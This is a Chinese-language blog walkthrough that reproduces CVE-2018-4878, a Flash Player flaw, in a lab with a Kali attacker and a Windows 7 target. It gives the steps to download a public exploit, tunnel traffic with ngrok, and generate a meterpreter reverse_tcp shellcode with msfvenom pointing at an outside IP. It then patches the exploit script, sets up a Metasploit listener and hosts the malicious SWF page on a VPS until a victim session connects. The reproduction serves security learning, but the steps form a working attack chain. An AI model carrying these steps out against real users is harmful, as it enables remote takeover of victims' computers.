CVE-2018-4878的复现

前言:

CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。

1 漏洞影响范围

Flash Player28.0.0.137及以前的所有版本

2 漏洞复现

2.1 测试环境

攻击机:kali2017

靶机:win7_x64+IE8+FLASH_player28.0.0.137

 

2.2 复现过程

1.在github上面下载cve-2018-4878的exp并解压

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

CVE-2018-4878的复现_第1张图片 

CVE-2018-4878的复现_第2张图片

2.用ngrok配置内网穿透

CVE-2018-4878的复现_第3张图片

这里的作用是将tcp://0.tcp.ngrok.io:10270的流量转发到本地的1234端口

我们再ping一下得到ip

3.用msfvenom生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=52.14.61.47 lport=10270 -f python>/var/shellcode.txt

 

CVE-2018-4878的复现_第4张图片

4.修改exp

复制我们生成的shellcode

CVE-2018-4878的复现_第5张图片

用vim打开我们的cve-2018-4878.py,然后用我们刚才生成的shellcode替换开头的shellcode

CVE-2018-4878的复现_第6张图片

然后将stageless的值改为false

CVE-2018-4878的复现_第7张图片

修改文件路径为我们的解压路径

CVE-2018-4878的复现_第8张图片

然后将解压路径下的exp测试弹出文件夹下的index.html和exploit.swf复制到解压路径

然后运行python cve-2018-4878.py

5.msf配置监听

运行msfconsole

CVE-2018-4878的复现_第9张图片

然后设置paylaod,监听地址,监听端口

CVE-2018-4878的复现_第10张图片

等待肉鸡上线

 

6.复制文件到vps上面,用靶机访问,完成复现

我们可以通过winscp将我们生成的exploit.swf和index.html复制到vps的html目录下

然后用靶机访问页面

CVE-2018-4878的复现_第11张图片

然后会返回一个session

CVE-2018-4878的复现_第12张图片

然后可以通过sessions -i命令进入meterpreter

复现成功

 

你可能感兴趣的:(CVE-2018-4878的复现)